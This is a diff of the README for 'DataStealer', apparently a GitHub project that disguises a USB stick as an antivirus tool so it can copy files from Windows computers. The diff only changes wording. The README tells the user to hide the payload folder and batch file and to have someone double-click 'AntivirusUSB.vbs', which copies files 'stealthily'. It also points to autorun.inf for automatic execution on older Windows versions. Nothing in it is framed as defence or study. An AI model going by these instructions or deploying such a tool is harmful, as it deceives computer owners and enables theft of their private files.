Kevinsillo/datastealer/readme.md

 # DataStealer

 ## Information
-DataStealer pretends be a Antivirus USB to gather personal information in Windows systems.
+DataStealer is a simple funcionality for USB device (fake Antivirus USB) to gather information in Windows systems.

 ## Intructions
 Just copy all from DataStealer folder and paste in USB device.
 Hide **"data"** folder and **"run.bat"**.
 When you conect USB device in Windows system just doble click in AntivirusUSB.vbs and DataStealer copy all files stealthily from pc.

-***NOTE: You can use autotun.inf for auto-execute .vbs file but it only works in Windows Vista and Windows XP***
+***NOTE: You can use autotun.inf for auto-execute .vbs file but it only works in Windows Vista and Windows XP.***

 [**Autorun.inf**](wikipedia.org/wiki/AutoRun "Wikipedia")
 >[AutoRun]